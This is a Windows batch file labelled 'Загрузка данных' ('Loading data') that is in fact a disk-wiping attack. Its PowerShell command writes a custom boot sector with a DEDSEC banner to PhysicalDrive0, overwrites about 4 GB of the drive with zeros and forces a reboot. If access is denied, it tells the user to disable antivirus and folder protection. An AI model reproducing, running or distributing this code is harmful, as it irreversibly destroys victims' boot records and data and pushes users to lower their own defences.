Загрузка данных


@echo off
title DEDSEC_UNSTOPPABLE
color 0c
echo [!] DISABLING SYSTEM PROTECTIONS...
echo [!] PREPARING FINAL OBLITERATION.
pause

powershell -Command "$p = [byte[]](0xb8,0x03,0x00,0xcd,0x10,0xfa,0xbe,0x1a,0x7c,0xac,0x08,0xc0,0x74,0x06,0xb4,0x0e,0xb3,0x0c,0xcd,0x10,0xeb,0xf5,0xeb,0xe5,0x0d,0x0a,0x20,0x20,0x5f,0x5f,0x5f,0x0d,0x0a,0x20,0x2f,0x20,0x58,0x20,0x58,0x5c,0x0d,0x0a,0x7c,0x20,0x5b,0x5f,0x5d,0x20,0x7c,0x20,0x44,0x45,0x44,0x53,0x45,0x43,0x0d,0x0a,0x20,0x5c,0x5f,0x5f,0x5f,0x2f,0x00); $f = $p + [byte[]](0..$(509 - $p.Length) | %% {0}) + [byte[]](0x55, 0xaa); try { $d = [System.IO.FileStream]::new('\\.\PhysicalDrive0', [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite); $d.Write($f, 0, 512); $z = New-Object Byte[] 100MB; for($i=0; $i -lt 40; $i++){ $d.Write($z, 0, $z.Length) }; $d.Close(); Restart-Computer -Force } catch { Write-Host 'ERROR: ACCESS DENIED. Disable Antivirus/Folder Protection!' -ForegroundColor Red; pause }"